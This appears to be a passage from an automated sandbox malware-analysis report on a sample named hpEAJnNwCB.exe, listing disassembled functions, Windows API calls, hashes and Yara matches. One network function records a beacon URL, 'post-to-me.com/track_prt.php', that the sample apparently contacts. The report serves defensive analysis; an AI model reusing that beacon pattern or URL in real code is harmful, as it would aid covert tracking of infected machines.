                                                                                                                                                                                                                                              • Part of subcall function 024A29A4: TlsGetValue.KERNEL32(?,?,024A0DC2,024A2ECF,00000000,?,024A0DA0,?,?,?,00000000,?,00000000), ref: 024A29AA
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024A7BB1
                                                                                                                                                                                                                                              • Part of subcall function 024B121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024B1241
                                                                                                                                                                                                                                              • Part of subcall function 024B121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024B125A
                                                                                                                                                                                                                                              • Part of subcall function 024B121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024B12D0
                                                                                                                                                                                                                                              • Part of subcall function 024B121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024B12D8
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024A7BBF
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024A7BC9
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024A7BD3
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 024A7BF1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4266703842-0
                                                                                                                                                                                                                                            • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                            • Instruction ID: 63a6168efa59bc22ac29f1bd201fa3cb77218330133dfbef81b4fe908216b4b4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32F0C275A0021867CB25F676983096EF62BDFF0B18B00416FD80057350DF649A158E91
                                                                                                                                                                                                                                            Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                                                                                                                                                              • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                                                                                                                                                              • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                                                                                                                                                              • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                                                                                                                                                              • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                                                                                                                                                            • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4266703842-0
                                                                                                                                                                                                                                            • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                            • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                                                                                                                                                            Function 024CA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA0C4
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA0D6
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA0E8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA0FA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024CA10C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                            • Instruction ID: 382cd38c2e09aeaaaa1a273c4c19b31b4e060b8ddf77ccfe49a8ec4bbb6470bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF044366052186B87F0EF5DE8C6C0777EAAA04754774495FF044D7B11CB71F8908E59
                                                                                                                                                                                                                                            Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439E5D
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439E6F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439E81
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439E93
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00439EA5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                            • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                                                                                                                                                            Function 024C1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19AF
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                              • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19C1
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19D4
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19E5
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024C19F6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                            • Instruction ID: 4417496dd0717ad0ad03f2fb9fd64814597d5885c6c8796930f198c9e8e9ef97
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0F974A003109B9BB17F19AC808053F61AF09B2272042AFF406967B2C774A862DFCE
                                                                                                                                                                                                                                            Function 024ACF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024ACF36
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024ACF67
                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 024ACF70
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024ACF83
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024ACF8C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2583373041-0
                                                                                                                                                                                                                                            • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                            • Instruction ID: 3992490ed3ab8e19f410018ee051475ae6215b4c94b92ceb980878a141b5f018
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF0A732200500DBCB25EF22E6B08BBB7B6AFE4610340454FF58707590DF21A847DB61
                                                                                                                                                                                                                                            Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00431748
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                              • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043175A
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043176D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043177E
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043178F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                            • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                                                                                                                                                            Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                                                                                                                                                            • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2583373041-0
                                                                                                                                                                                                                                            • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                            • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                                                                                                                                                            Function 02492E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02492E8E
                                                                                                                                                                                                                                              • Part of subcall function 02491321: _wcslen.LIBCMT ref: 02491328
                                                                                                                                                                                                                                              • Part of subcall function 02491321: _wcslen.LIBCMT ref: 02491344
                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024930A1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                            • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                            • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                            • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                            • Instruction ID: 1c2729e07f766e1da61ef0d648baf20ecbcd28dc1c6b3c1c4e3a577b2e3f688c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 315151A5E55344A8E720EFB0BC45B723378FF58712F10643BD518CB2B2E7A19984871E
                                                                                                                                                                                                                                            Function 024B8937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 024B896A
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 024B8A23
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                            • String ID: fB$csm
                                                                                                                                                                                                                                            • API String ID: 3480331319-1586063737
                                                                                                                                                                                                                                            • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                            • Instruction ID: 5a47428dcb69194b8a023fc929edc2f1d6e0dc7c2ffe823d3c0f5e2f806064d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C410A34A00248DBCF11DF29C884ADE7BB9AF49328F14815BE9156B391D732D915CFA1
                                                                                                                                                                                                                                            Function 024BF97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\hpEAJnNwCB.exe,00000104), ref: 024BF9BA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024BFA85
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 024BFA8F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\hpEAJnNwCB.exe
                                                                                                                                                                                                                                            • API String ID: 2506810119-245902517
                                                                                                                                                                                                                                            • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                            • Instruction ID: b85dcb5899922c8ae1927a32365a157012489019140e0e7e76a0796156e4ca4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04318171A00258EBDB26DF99DC809DEBBFCEF8A710B11406BF80997611D7709A45CBA0
                                                                                                                                                                                                                                            Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\hpEAJnNwCB.exe,00000104), ref: 0042F753
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0042F81E
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0042F828
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\hpEAJnNwCB.exe
                                                                                                                                                                                                                                            • API String ID: 2506810119-245902517
                                                                                                                                                                                                                                            • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                            • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                                                                                                                                                            Function 0249C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0249C8DE
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Exception@8Throw
                                                                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                            • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                            • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                            • Instruction ID: d057494db3768f074dcbe2801d37f5ae70fdc10ebbafc09334dac90c7717604e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58F02B728402087BCF04E754CC81BEB3B989B09316F04806BDD46AB182EB689946CBA4
                                                                                                                                                                                                                                            Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                            • String ID: F(@
                                                                                                                                                                                                                                            • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                            • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                            • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                                                                                                                                                                                                            Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                                                                                                                                                                            • String ID: F(@
                                                                                                                                                                                                                                            • API String ID: 3213686812-2698495834
                                                                                                                                                                                                                                            • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
